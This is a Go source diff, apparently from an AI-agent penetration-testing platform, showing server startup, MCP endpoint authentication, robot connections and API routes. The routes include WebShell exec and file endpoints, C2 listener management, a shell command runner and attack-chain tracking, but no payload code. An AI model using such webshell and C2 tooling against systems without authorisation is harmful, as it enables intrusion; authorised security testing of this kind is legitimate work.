App 实例以便动态获取 handler) + setupRoutes( + router, + authHandler, + agentHandler, + monitorHandler, + notificationHandler, + conversationHandler, + robotHandler, + wechatRobotHandler, + groupHandler, + configHandler, + externalMCPHandler, + attackChainHandler, + app, // 传递 App 实例以便动态获取 knowledgeHandler + vulnerabilityHandler, + assetHandler, + projectHandler, + workflowHandler, + webshellHandler, + chatUploadsHandler, + roleHandler, + skillsHandler, + markdownAgentsHandler, + fofaHandler, + terminalHandler, + app.c2Handler, + auditHandler, + auditSvc, + rbacHandler, + mcpServer, + authManager, + openAPIHandler, + ) + + return app, nil + +} + +// mcpHandlerWithAuth 在鉴权通过后转发到 MCP 处理;若配置了 auth_header 则校验请求头,否则直接放行 +func (a *App) mcpHandlerWithAuth(w http.ResponseWriter, r *http.Request) { + cfg := a.config.MCP + if authHeader := strings.TrimSpace(r.Header.Get("Authorization")); len(authHeader) > 7 && strings.EqualFold(authHeader[:7], "Bearer ") { + if session, ok := a.auth.ValidateToken(strings.TrimSpace(authHeader[7:])); ok && session.Permissions["mcp:execute"] { + principal := authctx.NewPrincipalWithScopes(session.UserID, session.Username, session.Scope, session.Permissions, session.PermissionScopes) + a.mcpServer.HandleHTTP(w, r.WithContext(authctx.WithPrincipal(r.Context(), principal))) + return + } + } + if !cfg.AllowGlobalAccess || strings.TrimSpace(cfg.AuthHeader) == "" || strings.TrimSpace(cfg.AuthHeaderValue) == "" { + http.Error(w, "use an authorized user bearer token; global MCP service access is disabled", http.StatusUnauthorized) + return + } + if subtle.ConstantTimeCompare([]byte(r.Header.Get(cfg.AuthHeader)), []byte(cfg.AuthHeaderValue)) != 1 { + a.logger.Logger.Debug("MCP 鉴权失败:header 缺失或值不匹配", zap.String("header", cfg.AuthHeader)) + w.Header().Set("Content-Type", "application/json") + w.WriteHeader(http.StatusUnauthorized) + w.Write([]byte(`{"error":"unauthorized"}`)) + return + } + permissions := make(map[string]bool, len(security.PermissionCatalog)) + for permission := range security.PermissionCatalog { + permissions[permission] = true + } + principal := authctx.NewPrincipal("service:mcp", "mcp-service", database.RBACScopeAll, permissions) + r = r.WithContext(authctx.WithPrincipal(r.Context(), principal)) + a.mcpServer.HandleHTTP(w, r) +} + +// Run 启动应用(向后兼容,不支持优雅关闭) +func (a *App) Run() error { + return a.RunWithContext(context.Background()) +} + +// RunWithContext 启动应用,支持通过 context 取消来优雅关闭 +func (a *App) RunWithContext(ctx context.Context) error { + // 启动MCP服务器(如果启用) + var mcpServer *http.Server + if a.config.MCP.Enabled { + mcpAddr := fmt.Sprintf("%s:%d", a.config.MCP.Host, a.config.MCP.Port) + a.logger.Info("启动MCP服务器", zap.String("address", mcpAddr)) + + mux := http.NewServeMux() + mux.HandleFunc("/mcp", a.mcpHandlerWithAuth) + + mcpServer = &http.Server{Addr: mcpAddr, Handler: mux} + go func() { + if err := mcpServer.ListenAndServe(); err != nil && err != http.ErrServerClosed { + a.logger.Error("MCP服务器启动失败", zap.Error(err)) + } + }() + } + + // 启动主服务器(可选 HTTPS + HTTP/2,见 config server.tls_*) + addr := fmt.Sprintf("%s:%d", a.config.Server.Host, a.config.Server.Port) + tlsMode, tlsConf, certFile, keyFile, tlsErr := prepareMainServerTLS(&a.config.Server) + if tlsErr != nil { + return tlsErr + } + + srv := &http.Server{Addr: addr, Handler: a.router} + var mainMux *mainServerMux + httpRedirect := config.ServerHTTPRedirectEnabled(&a.config.Server) + if tlsMode != mainTLSOff { + srv.TLSConfig = tlsConf + if err := http2.ConfigureServer(srv, &http2.Server{}); err != nil { + return fmt.Errorf("主服务 HTTP/2 配置失败: %w", err) + } + switch tlsMode { + case mainTLSFromFiles: + a.logger.Debug("启动 HTTPS 主服务(已启用 HTTP/2 协商)", + zap.String("address", addr), + zap.String("cert", certFile), + ) + case mainTLSInMemorySelfSigned: + a.logger.Debug("启动 HTTPS 主服务(内存自签证书,仅测试;已启用 HTTP/2 协商)", + zap.String("address", addr), + ) + } + if httpRedirect { + a.logger.Debug("已启用 HTTP→HTTPS 自动跳转(同端口嗅探分流)", zap.String("address", addr)) + } + } else { + a.logger.Debug("启动 HTTP 主服务", zap.String("address", addr)) + } + + // 监听 context 取消,优雅关闭 HTTP 服务器 + go func() { + <-ctx.Done() + shutdownCtx, cancel := context.WithTimeout(context.Background(), 10*time.Second) + defer cancel() + if mainMux != nil { + if err := mainMux.Shutdown(shutdownCtx); err != nil { + a.logger.Error("HTTP/HTTPS 分流服务器关闭失败", zap.Error(err)) + } + } else if err := srv.Shutdown(shutdownCtx); err != nil { + a.logger.Error("HTTP服务器关闭失败", zap.Error(err)) + } + if mcpServer != nil { + if err := mcpServer.Shutdown(shutdownCtx); err != nil { + a.logger.Error("MCP服务器关闭失败", zap.Error(err)) + } + } + }() + + var err error + switch { + case tlsMode != mainTLSOff && httpRedirect: + var tlsConfReady *tls.Config + tlsConfReady, err = ensureMainTLSConfigCerts(tlsMode, tlsConf, certFile, keyFile) + if err != nil { + return fmt.Errorf("加载 TLS 证书: %w", err) + } + srv.TLSConfig = tlsConfReady + var ln net.Listener + ln, err = net.Listen("tcp", addr) + if err != nil { + return err + } + mainMux = newMainServerMux(ln, srv, portFromListenAddr(addr), a.logger.Logger) + err = mainMux.Serve() + case tlsMode == mainTLSOff: + err = srv.ListenAndServe() + case tlsMode == mainTLSFromFiles: + err = srv.ListenAndServeTLS(certFile, keyFile) + case tlsMode == mainTLSInMemorySelfSigned: + var ln net.Listener + ln, err = tls.Listen("tcp", addr, srv.TLSConfig) + if err == nil { + err = srv.Serve(ln) + } + default: + err = srv.ListenAndServe() + } + if err != nil && err != http.ErrServerClosed { + return err + } + return nil +} + +// Shutdown 关闭应用 +func (a *App) Shutdown() { + shutdownCtx, shutdownCancel := context.WithTimeout(context.Background(), 5*time.Second) + _ = einoobserve.ShutdownOtel(shutdownCtx) + shutdownCancel() + if a.alertCancel != nil { + a.alertCancel() + a.alertCancel = nil + } + + // 停止钉钉/飞书长连接 + a.robotMu.Lock() + if a.dingCancel != nil { + a.dingCancel() + a.dingCancel = nil + } + if a.larkCancel != nil { + a.larkCancel() + a.larkCancel = nil + } + a.robotMu.Unlock() + + a.shutdownC2() + + // 停止所有外部MCP客户端 + if a.externalMCPMgr != nil { + a.externalMCPMgr.StopAll() + } + + // 关闭知识库数据库连接(如果使用独立数据库) + if a.knowledgeDB != nil { + if err := a.knowledgeDB.Close(); err != nil { + a.logger.Logger.Warn("关闭知识库数据库连接失败", zap.Error(err)) + } + } + + // 关闭主数据库连接 + if a.db != nil { + if err := a.db.Close(); err != nil { + a.logger.Logger.Warn("关闭主数据库连接失败", zap.Error(err)) + } + } +} + +// startRobotConnections 根据当前配置启动钉钉/飞书长连接(不先关闭已有连接,仅用于首次启动) +func (a *App) startRobotConnections() { + a.robotMu.Lock() + defer a.robotMu.Unlock() + cfg := a.config + if cfg.Robots.Lark.Enabled && cfg.Robots.Lark.AppID != "" && cfg.Robots.Lark.AppSecret != "" { + ctx, cancel := context.WithCancel(context.Background()) + a.larkCancel = cancel + go robot.StartLark(ctx, cfg.Robots, a.robotHandler, a.logger.Logger) + } + if cfg.Robots.Dingtalk.Enabled && cfg.Robots.Dingtalk.ClientID != "" && cfg.Robots.Dingtalk.ClientSecret != "" { + ctx, cancel := context.WithCancel(context.Background()) + a.dingCancel = cancel + go robot.StartDing(ctx, cfg.Robots, a.robotHandler, a.logger.Logger) + } + if cfg.Robots.Wechat.Enabled && cfg.Robots.Wechat.BotToken != "" { + ctx, cancel := context.WithCancel(context.Background()) + a.wechatCancel = cancel + go robot.StartWechat(ctx, cfg.Robots, a.robotHandler, cfg.Version, a.logger.Logger) + } + if cfg.Robots.Telegram.Enabled && strings.TrimSpace(cfg.Robots.Telegram.BotToken) != "" { + ctx, cancel := context.WithCancel(context.Background()) + a.telegramCancel = cancel + go robot.StartTelegram(ctx, cfg.Robots, a.robotHandler, a.logger.Logger) + } + if cfg.Robots.Slack.Enabled && strings.TrimSpace(cfg.Robots.Slack.BotToken) != "" && strings.TrimSpace(cfg.Robots.Slack.AppToken) != "" { + ctx, cancel := context.WithCancel(context.Background()) + a.slackCancel = cancel + go robot.StartSlack(ctx, cfg.Robots, a.robotHandler, a.logger.Logger) + } + if cfg.Robots.Discord.Enabled && strings.TrimSpace(cfg.Robots.Discord.BotToken) != "" { + ctx, cancel := context.WithCancel(context.Background()) + a.discordCancel = cancel + go robot.StartDiscord(ctx, cfg.Robots, a.robotHandler, a.logger.Logger) + } + if cfg.Robots.QQ.Enabled && strings.TrimSpace(cfg.Robots.QQ.AppID) != "" && strings.TrimSpace(cfg.Robots.QQ.ClientSecret) != "" { + ctx, cancel := context.WithCancel(context.Background()) + a.qqCancel = cancel + go robot.StartQQ(ctx, cfg.Robots, a.robotHandler, a.logger.Logger) + } +} + +// RestartRobotConnections 重启钉钉/飞书/微信长连接,使前端应用配置后立即生效(实现 handler.RobotRestarter) +func (a *App) RestartRobotConnections() { + a.robotMu.Lock() + if a.dingCancel != nil { + a.dingCancel() + a.dingCancel = nil + } + if a.larkCancel != nil { + a.larkCancel() + a.larkCancel = nil + } + if a.wechatCancel != nil { + a.wechatCancel() + a.wechatCancel = nil + } + if a.telegramCancel != nil { + a.telegramCancel() + a.telegramCancel = nil + } + if a.slackCancel != nil { + a.slackCancel() + a.slackCancel = nil + } + if a.discordCancel != nil { + a.discordCancel() + a.discordCancel = nil + } + if a.qqCancel != nil { + a.qqCancel() + a.qqCancel = nil + } + a.robotMu.Unlock() + // 给旧 goroutine 一点时间退出 + time.Sleep(200 * time.Millisecond) + a.startRobotConnections() +} + +// setupRoutes 设置路由 +func setupRoutes( + router *gin.Engine, + authHandler *handler.AuthHandler, + agentHandler *handler.AgentHandler, + monitorHandler *handler.MonitorHandler, + notificationHandler *handler.NotificationHandler, + conversationHandler *handler.ConversationHandler, + robotHandler *handler.RobotHandler, + wechatRobotHandler *handler.WechatRobotHandler, + groupHandler *handler.GroupHandler, + configHandler *handler.ConfigHandler, + externalMCPHandler *handler.ExternalMCPHandler, + attackChainHandler *handler.AttackChainHandler, + app *App, // 传递 App 实例以便动态获取 knowledgeHandler + vulnerabilityHandler *handler.VulnerabilityHandler, + assetHandler *handler.AssetHandler, + projectHandler *handler.ProjectHandler, + workflowHandler *handler.WorkflowHandler, + webshellHandler *handler.WebShellHandler, + chatUploadsHandler *handler.ChatUploadsHandler, + roleHandler *handler.RoleHandler, + skillsHandler *handler.SkillsHandler, + markdownAgentsHandler *handler.MarkdownAgentsHandler, + fofaHandler *handler.FofaHandler, + terminalHandler *handler.TerminalHandler, + c2Handler *handler.C2Handler, + auditHandler *handler.AuditHandler, + auditSvc *audit.Service, + rbacHandler *handler.RBACHandler, + mcpServer *mcp.Server, + authManager *security.AuthManager, + openAPIHandler *handler.OpenAPIHandler, +) { + // API路由 + api := router.Group("/api") + + // 认证相关路由 + authRoutes := api.Group("/auth") + loginRL := security.NewRateLimiter(10, 1*time.Minute) + { + authRoutes.POST("/login", security.RateLimitMiddleware(loginRL), authHandler.Login) + authRoutes.POST("/logout", security.AuthMiddleware(authManager), authHandler.Logout) + authRoutes.POST("/change-password", security.AuthMiddleware(authManager), security.RequirePermission("auth:self"), authHandler.ChangePassword) + authRoutes.GET("/validate", security.AuthMiddleware(authManager), authHandler.Validate) + authRoutes.POST("/robot-binding-code", security.AuthMiddleware(authManager), security.RequirePermission("auth:self"), robotHandler.CreateRobotBindingCode) + authRoutes.GET("/robot-bindings", security.AuthMiddleware(authManager), security.RequirePermission("auth:self"), robotHandler.ListMyRobotBindings) + authRoutes.DELETE("/robot-bindings/:id", security.AuthMiddleware(authManager), security.RequirePermission("auth:self"), robotHandler.DeleteMyRobotBinding) + } + + // 机器人回调(无需登录,供企业微信/钉钉/飞书服务器调用) + // 添加速率限制:每个 IP 每分钟最多 60 次请求,防止滥用 + robotRL := security.NewRateLimiter(60, 1*time.Minute) + robotGroup := api.Group("/robot") + robotGroup.Use(security.RateLimitMiddleware(robotRL)) + { + robotGroup.GET("/wecom", robotHandler.HandleWecomGET) + robotGroup.POST("/wecom", robotHandler.HandleWecomPOST) + robotGroup.POST("/dingtalk", robotHandler.HandleDingtalkPOST) + robotGroup.POST("/lark", robotHandler.HandleLarkPOST) + } + + protected := api.Group("") + protected.Use(security.AuthMiddleware(authManager)) + protected.Use(security.RBACMiddlewareWithDenyHook(app.db, func(c *gin.Context, reason, permission string) { + if auditSvc != nil { + auditSvc.Record(c, audit.Entry{ + Level: "warn", Category: "rbac", Action: "access_denied", Result: "failure", + Message: "RBAC 拒绝访问", ResourceType: "route", ResourceID: c.FullPath(), + Detail: map[string]interface{}{"reason": reason, "permission": permission, "method": c.Request.Method}, + }) + } + })) + { + protected.GET("/rbac/me", rbacHandler.Me) + protected.GET("/rbac/metadata", rbacHandler.Metadata) + protected.GET("/rbac/users", rbacHandler.ListUsers) + protected.POST("/rbac/users", rbacHandler.CreateUser) + protected.PUT("/rbac/users/:id", rbacHandler.UpdateUser) + protected.DELETE("/rbac/users/:id", rbacHandler.DeleteUser) + protected.GET("/rbac/roles", rbacHandler.ListRoles) + protected.POST("/rbac/roles", rbacHandler.CreateRole) + protected.PUT("/rbac/roles/:id", rbacHandler.UpdateRole) + protected.DELETE("/rbac/roles/:id", rbacHandler.DeleteRole) + protected.GET("/rbac/resource-assignments", rbacHandler.ListResourceAssignments) + protected.GET("/rbac/resources", rbacHandler.ListAssignableResources) + protected.POST("/rbac/resource-assignments", rbacHandler.AssignResource) + protected.DELETE("/rbac/resource-assignments/:id", rbacHandler.DeleteResourceAssignment) + + // 机器人测试(需登录):POST /api/robot/test,body: {"platform":"dingtalk","user_id":"test","text":"帮助"},用于验证机器人逻辑 + protected.POST("/robot/test", robotHandler.HandleRobotTest) + + // 微信 iLink 扫码绑定(需登录) + protected.POST("/robot/wechat/qrcode", wechatRobotHandler.HandleWechatQRCode) + protected.GET("/robot/wechat/qrcode/status", wechatRobotHandler.HandleWechatQRCodeStatus) + protected.POST("/robot/wechat/qrcode/verify", wechatRobotHandler.HandleWechatVerifyCode) + protected.GET("/robot/wechat/status", wechatRobotHandler.HandleWechatStatus) + + // Eino ADK 单代理(ChatModelAgent + Runner;不依赖 multi_agent.enabled) + protected.POST("/eino-agent", agentHandler.EinoSingleAgentLoop) + protected.POST("/eino-agent/stream", agentHandler.EinoSingleAgentLoopStream) + protected.GET("/hitl/pending", agentHandler.ListHITLPending) + protected.GET("/hitl/logs", agentHandler.ListHITLLogs) + protected.DELETE("/hitl/logs", agentHandler.DeleteHITLLogs) + protected.GET("/hitl/logs/:id", agentHandler.GetHITLLog) + protected.POST("/hitl/decision", agentHandler.DecideHITLInterrupt) + protected.POST("/hitl/dismiss", agentHandler.DismissHITLInterrupt) + protected.GET("/hitl/config/:conversationId", agentHandler.GetHITLConversationConfig) + protected.PUT("/hitl/config", agentHandler.UpsertHITLConversationConfig) + protected.GET("/hitl/tool-whitelist", agentHandler.GetHITLGlobalToolWhitelist) + protected.PUT("/hitl/tool-whitelist", agentHandler.SetHITLGlobalToolWhitelist) + protected.POST("/hitl/tool-whitelist", agentHandler.MergeHITLGlobalToolWhitelist) + protected.GET("/hitl/default-reviewer", agentHandler.GetHITLDefaultReviewer) + protected.PUT("/hitl/default-reviewer", agentHandler.UpdateHITLDefaultReviewer) + protected.GET("/hitl/audit-strategy", agentHandler.GetHITLAuditStrategy) + protected.PUT("/hitl/audit-strategy", agentHandler.UpdateHITLAuditStrategy) + // Agent Loop 取消与任务列表 + protected.POST("/agent-loop/cancel", agentHandler.CancelAgentLoop) + protected.GET("/agent-loop/tasks", agentHandler.ListAgentTasks) + protected.GET("/agent-loop/task-events", agentHandler.SubscribeAgentTaskEvents) + protected.GET("/agent-loop/tasks/completed", agentHandler.ListCompletedTasks) + + // Eino DeepAgent 多代理(与单 Agent 并存,需 config.multi_agent.enabled) + // 多代理路由常注册;是否可用由运行时 h.config.MultiAgent.Enabled 决定(应用配置后无需重启) + protected.POST("/multi-agent", agentHandler.MultiAgentLoop) + protected.POST("/multi-agent/stream", agentHandler.MultiAgentLoopStream) + protected.GET("/multi-agent/markdown-agents", markdownAgentsHandler.ListMarkdownAgents) + protected.GET("/multi-agent/markdown-agents/:filename", markdownAgentsHandler.GetMarkdownAgent) + protected.POST("/multi-agent/markdown-agents", markdownAgentsHandler.CreateMarkdownAgent) + protected.PUT("/multi-agent/markdown-agents/:filename", markdownAgentsHandler.UpdateMarkdownAgent) + protected.DELETE("/multi-agent/markdown-agents/:filename", markdownAgentsHandler.DeleteMarkdownAgent) + + // 信息收集 - FOFA 查询(后端代理) + protected.POST("/fofa/search", fofaHandler.Search) + // 信息收集 - 自然语言解析为 FOFA 语法(需人工确认后再查询) + protected.POST("/fofa/parse", fofaHandler.ParseNaturalLanguage) + + // 资产管理 + protected.GET("/assets", assetHandler.List) + protected.GET("/assets/selection", assetHandler.Selection) + protected.GET("/assets/stats", assetHandler.Stats) + protected.POST("/assets/import", assetHandler.Import) + protected.POST("/assets/scan-links", assetHandler.RecordScans) + protected.PUT("/assets/bulk", assetHandler.BulkUpdate) + protected.PUT("/assets/project-binding", assetHandler.UpdateProjectBinding) + protected.POST("/assets/batch-delete", assetHandler.BatchDelete) + protected.POST("/assets/merge", security.RequirePermission("asset:write"), assetHandler.Merge) + protected.PUT("/assets/:id", assetHandler.Update) + protected.DELETE("/assets/:id", assetHandler.Delete) + + // 批量任务管理 + protected.POST("/batch-tasks", agentHandler.CreateBatchQueue) + protected.GET("/batch-tasks", agentHandler.ListBatchQueues) + protected.GET("/batch-tasks/:queueId", agentHandler.GetBatchQueue) + protected.POST("/batch-tasks/:queueId/start", agentHandler.StartBatchQueue) + protected.POST("/batch-tasks/:queueId/rerun", agentHandler.RerunBatchQueue) + protected.POST("/batch-tasks/:queueId/pause", agentHandler.PauseBatchQueue) + protected.PUT("/batch-tasks/:queueId/metadata", agentHandler.UpdateBatchQueueMetadata) + protected.PUT("/batch-tasks/:queueId/schedule", agentHandler.UpdateBatchQueueSchedule) + protected.PUT("/batch-tasks/:queueId/schedule-enabled", agentHandler.SetBatchQueueScheduleEnabled) + protected.DELETE("/batch-tasks/:queueId", agentHandler.DeleteBatchQueue) + protected.PUT("/batch-tasks/:queueId/tasks/:taskId", agentHandler.UpdateBatchTask) + protected.POST("/batch-tasks/:queueId/tasks/:taskId/run", agentHandler.RunSingleBatchTask) + protected.POST("/batch-tasks/:queueId/tasks", agentHandler.AddBatchTask) + protected.DELETE("/batch-tasks/:queueId/tasks/:taskId", agentHandler.DeleteBatchTask) + + // 对话历史 + protected.POST("/conversations", conversationHandler.CreateConversation) + protected.GET("/conversations", conversationHandler.ListConversations) + protected.GET("/conversations/:id", conversationHandler.GetConversation) + protected.GET("/conversations/:id/plan-tasks", conversationHandler.GetConversationPlanTasks) + protected.GET("/messages/:id/process-details", conversationHandler.GetMessageProcessDetails) + protected.GET("/process-details/:id", conversationHandler.GetProcessDetail) + protected.PUT("/conversations/:id", conversationHandler.UpdateConversation) + protected.PUT("/conversations/:id/project", conversationHandler.SetConversationProject) + protected.DELETE("/conversations/:id", conversationHandler.DeleteConversation) + protected.POST("/conversations/:id/delete-turn", conversationHandler.DeleteConversationTurn) + protected.PUT("/conversations/:id/pinned", groupHandler.UpdateConversationPinned) + + // 对话分组 + protected.POST("/groups", groupHandler.CreateGroup) + protected.GET("/groups", groupHandler.ListGroups) + protected.GET("/groups/:id", groupHandler.GetGroup) + protected.PUT("/groups/:id", groupHandler.UpdateGroup) + protected.DELETE("/groups/:id", groupHandler.DeleteGroup) + protected.PUT("/groups/:id/pinned", groupHandler.UpdateGroupPinned) + protected.GET("/groups/:id/conversations", groupHandler.GetGroupConversations) + protected.GET("/groups/mappings", groupHandler.GetAllMappings) + protected.POST("/groups/conversations", groupHandler.AddConversationToGroup) + protected.DELETE("/groups/:id/conversations/:conversationId", groupHandler.RemoveConversationFromGroup) + protected.PUT("/groups/:id/conversations/:conversationId/pinned", groupHandler.UpdateConversationPinnedInGroup) + + // 监控 + protected.GET("/monitor", monitorHandler.Monitor) + protected.GET("/monitor/execution/:id", monitorHandler.GetExecution) + protected.POST("/monitor/execution/:id/cancel", monitorHandler.CancelExecution) + protected.POST("/monitor/executions/names", monitorHandler.BatchGetToolNames) + protected.DELETE("/monitor/execution/:id", monitorHandler.DeleteExecution) + protected.DELETE("/monitor/executions", monitorHandler.DeleteExecutions) + protected.GET("/monitor/stats", monitorHandler.GetStats) + protected.GET("/monitor/calls-timeline", monitorHandler.GetCallsTimeline) + protected.GET("/notifications/summary", notificationHandler.GetSummary) + protected.POST("/notifications/read", notificationHandler.MarkRead) + + // 配置管理 + protected.GET("/config", configHandler.GetConfig) + protected.GET("/config/tools", configHandler.GetTools) + protected.GET("/config/tools/:name/schema", configHandler.GetToolSchema) + protected.PUT("/config", configHandler.UpdateConfig) + protected.POST("/config/apply", configHandler.ApplyConfig) + protected.POST("/config/test-openai", configHandler.TestOpenAI) + protected.POST("/config/test-vision", configHandler.TestVision) + protected.POST("/config/list-models", configHandler.ListModels) + + // 系统设置 - 终端(执行命令,提高运维效率) + protected.POST("/terminal/run", terminalHandler.RunCommand) + protected.POST("/terminal/run/stream", terminalHandler.RunCommandStream) + protected.GET("/terminal/ws", terminalHandler.RunCommandWS) + + // 平台审计日志 + protected.GET("/audit/meta", auditHandler.Meta) + protected.GET("/audit/summary", auditHandler.Summary) + protected.GET("/audit/logs", auditHandler.ListLogs) + protected.GET("/audit/logs/export", auditHandler.ExportLogs) + protected.GET("/audit/logs/:id", auditHandler.GetLog) + + // 外部MCP管理 + protected.GET("/external-mcp", externalMCPHandler.GetExternalMCPs) + protected.GET("/external-mcp/stats", externalMCPHandler.GetExternalMCPStats) + protected.GET("/external-mcp/:name", externalMCPHandler.GetExternalMCP) + protected.PUT("/external-mcp/:name", externalMCPHandler.AddOrUpdateExternalMCP) + protected.DELETE("/external-mcp/:name", externalMCPHandler.DeleteExternalMCP) + protected.POST("/external-mcp/:name/start", externalMCPHandler.StartExternalMCP) + protected.POST("/external-mcp/:name/stop", externalMCPHandler.StopExternalMCP) + + // 攻击链可视化 + protected.GET("/attack-chain/:conversationId", attackChainHandler.GetAttackChain) + protected.POST("/attack-chain/:conversationId/regenerate", attackChainHandler.RegenerateAttackChain) + + // 知识库管理(始终注册路由,通过 App 实例动态获取 handler) + knowledgeRoutes := protected.Group("/knowledge") + { + knowledgeRoutes.GET("/categories", func(c *gin.Context) { + if app.knowledgeHandler == nil { + c.JSON(http.StatusOK, gin.H{ + "categories": []string{}, + "enabled": false, + "message": "知识库功能未启用,请前往系统设置启用知识检索功能", + }) + return + } + app.knowledgeHandler.GetCategories(c) + }) + knowledgeRoutes.GET("/items", func(c *gin.Context) { + if app.knowledgeHandler == nil { + c.JSON(http.StatusOK, gin.H{ + "items": []interface{}{}, + "enabled": false, + "message": "知识库功能未启用,请前往系统设置启用知识检索功能", + }) + return + } + app.knowledgeHandler.GetItems(c) + }) + knowledgeRoutes.GET("/items/:id", func(c *gin.Context) { + if app.knowledgeHandler == nil { + c.JSON(http.StatusOK, gin.H{ + "enabled": false, + "message": "知识库功能未启用,请前往系统设置启用知识检索功能", + }) + return + } + app.knowledgeHandler.GetItem(c) + }) + knowledgeRoutes.POST("/items", func(c *gin.Context) { + if app.knowledgeHandler == nil { + c.JSON(http.StatusOK, gin.H{ + "enabled": false, + "error": "知识库功能未启用,请前往系统设置启用知识检索功能", + }) + return + } + app.knowledgeHandler.CreateItem(c) + }) + knowledgeRoutes.PUT("/items/:id", func(c *gin.Context) { + if app.knowledgeHandler == nil { + c.JSON(http.StatusOK, gin.H{ + "enabled": false, + "error": "知识库功能未启用,请前往系统设置启用知识检索功能", + }) + return + } + app.knowledgeHandler.UpdateItem(c) + }) + knowledgeRoutes.DELETE("/items/:id", func(c *gin.Context) { + if app.knowledgeHandler == nil { + c.JSON(http.StatusOK, gin.H{ + "enabled": false, + "error": "知识库功能未启用,请前往系统设置启用知识检索功能", + }) + return + } + app.knowledgeHandler.DeleteItem(c) + }) + knowledgeRoutes.GET("/index-status", func(c *gin.Context) { + if app.knowledgeHandler == nil { + c.JSON(http.StatusOK, gin.H{ + "enabled": false, + "total_items": 0, + "indexed_items": 0, + "progress_percent": 0, + "is_complete": false, + "message": "知识库功能未启用,请前往系统设置启用知识检索功能", + }) + return + } + app.knowledgeHandler.GetIndexStatus(c) + }) + knowledgeRoutes.POST("/index", func(c *gin.Context) { + if app.knowledgeHandler == nil { + c.JSON(http.StatusOK, gin.H{ + "enabled": false, + "error": "知识库功能未启用,请前往系统设置启用知识检索功能", + }) + return + } + app.knowledgeHandler.StartIndex(c) + }) + knowledgeRoutes.POST("/scan", func(c *gin.Context) { + if app.knowledgeHandler == nil { + c.JSON(http.StatusOK, gin.H{ + "enabled": false, + "error": "知识库功能未启用,请前往系统设置启用知识检索功能", + }) + return + } + app.knowledgeHandler.ScanKnowledgeBase(c) + }) + knowledgeRoutes.GET("/retrieval-logs", func(c *gin.Context) { + if app.knowledgeHandler == nil { + c.JSON(http.StatusOK, gin.H{ + "logs": []interface{}{}, + "enabled": false, + "message": "知识库功能未启用,请前往系统设置启用知识检索功能", + }) + return + } + app.knowledgeHandler.GetRetrievalLogs(c) + }) + knowledgeRoutes.DELETE("/retrieval-logs/:id", func(c *gin.Context) { + if app.knowledgeHandler == nil { + c.JSON(http.StatusOK, gin.H{ + "enabled": false, + "error": "知识库功能未启用,请前往系统设置启用知识检索功能", + }) + return + } + app.knowledgeHandler.DeleteRetrievalLog(c) + }) + knowledgeRoutes.POST("/search", func(c *gin.Context) { + if app.knowledgeHandler == nil { + c.JSON(http.StatusOK, gin.H{ + "results": []interface{}{}, + "enabled": false, + "message": "知识库功能未启用,请前往系统设置启用知识检索功能", + }) + return + } + app.knowledgeHandler.Search(c) + }) + knowledgeRoutes.GET("/stats", func(c *gin.Context) { + if app.knowledgeHandler == nil { + c.JSON(http.StatusOK, gin.H{ + "enabled": false, + "total_categories": 0, + "total_items": 0, + "message": "知识库功能未启用,请前往系统设置启用知识检索功能", + }) + return + } + app.knowledgeHandler.GetStats(c) + }) + } + + // 漏洞管理 + protected.GET("/vulnerabilities", vulnerabilityHandler.ListVulnerabilities) + protected.GET("/vulnerabilities/export", vulnerabilityHandler.ExportVulnerabilities) + protected.DELETE("/vulnerabilities/batch", vulnerabilityHandler.BatchDeleteVulnerabilities) + protected.GET("/vulnerabilities/filter-options", vulnerabilityHandler.GetVulnerabilityFilterOptions) + protected.GET("/vulnerabilities/stats", vulnerabilityHandler.GetVulnerabilityStats) + protected.GET("/vulnerability-alerts/subscription", vulnerabilityHandler.GetMyAlertSubscription) + protected.PUT("/vulnerability-alerts/subscription", vulnerabilityHandler.UpdateMyAlertSubscription) + protected.GET("/vulnerabilities/:id", vulnerabilityHandler.GetVulnerability) + protected.POST("/vulnerabilities", vulnerabilityHandler.CreateVulnerability) + protected.PUT("/vulnerabilities/:id", vulnerabilityHandler.UpdateVulnerability) + protected.DELETE("/vulnerabilities/:id", vulnerabilityHandler.DeleteVulnerability) + + // 项目管理与事实黑板 + protected.GET("/projects/dashboard-summary", projectHandler.GetDashboardSummary) + protected.GET("/projects", projectHandler.ListProjects) + protected.POST("/projects", projectHandler.CreateProject) + protected.GET("/projects/:id/stats", projectHandler.GetProjectStats) + protected.GET("/projects/:id/conversations", projectHandler.ListProjectConversations) + protected.GET("/projects/:id", projectHandler.GetProject) + protected.PUT("/projects/:id", projectHandler.UpdateProject) + protected.DELETE("/projects/:id", projectHandler.DeleteProject) + protected.GET("/projects/:id/fact-graph", projectHandler.GetFactGraph) + protected.GET("/projects/:id/fact-edges", projectHandler.ListFactEdges) + protected.POST("/projects/:id/fact-edges", projectHandler.CreateFactEdge) + protected.DELETE("/projects/:id/fact-edges/:edgeId", projectHandler.DeleteFactEdge) + protected.POST("/projects/:id/promote-attack-chain/:conversationId", projectHandler.PromoteAttackChain) + protected.GET("/projects/:id/facts", projectHandler.ListFacts) + protected.POST("/projects/:id/facts", projectHandler.CreateFact) + protected.PUT("/projects/:id/facts/:factId", projectHandler.UpdateFact) + protected.DELETE("/projects/:id/facts/:factId", projectHandler.DeleteFact) + protected.POST("/projects/:id/facts/deprecate", projectHandler.DeprecateFact) + protected.POST("/projects/:id/facts/restore", projectHandler.RestoreFact) + + // WebShell 管理(代理执行 + 连接配置存 SQLite) + protected.GET("/webshell/connections", webshellHandler.ListConnections) + protected.POST("/webshell/connections", webshellHandler.CreateConnection) + protected.GET("/webshell/connections/:id/ai-history", webshellHandler.GetAIHistory) + protected.GET("/webshell/connections/:id/ai-conversations", webshellHandler.ListAIConversations) + protected.GET("/webshell/connections/:id/state", webshellHandler.GetConnectionState) + protected.PUT("/webshell/connections/:id", webshellHandler.UpdateConnection) + protected.PUT("/webshell/connections/:id/state", webshellHandler.SaveConnectionState) + protected.DELETE("/webshell/connections/:id", webshellHandler.DeleteConnection) + protected.POST("/webshell/exec", webshellHandler.Exec) + protected.POST("/webshell/file", webshellHandler.FileOp) + + // C2 管理(未启用时返回 503,避免 Handler 空指针) + c2Routes := protected.Group("/c2") + c2Routes.Use(func(c *gin.Context) { + if app.c2Manager == nil { + c.AbortWithStatusJSON(http.StatusServiceUnavailable, gin.H{ + "error": "c2_disabled", + "message": "C2 功能已在系统设置中关闭", + "enabled": false, + }) + return + } + c.Next() + }) + c2Routes.GET("/listeners", c2Handler.ListListeners) + c2Routes.POST("/listeners", c2Handler.CreateListener) + c2Routes.GET("/listeners/:id", c2Handler.GetListener) + c2Routes.PUT("/listeners/:id", c2Handler.UpdateListener) + c2Routes.DELETE("/listeners/:id", c2Handler.DeleteListener) + 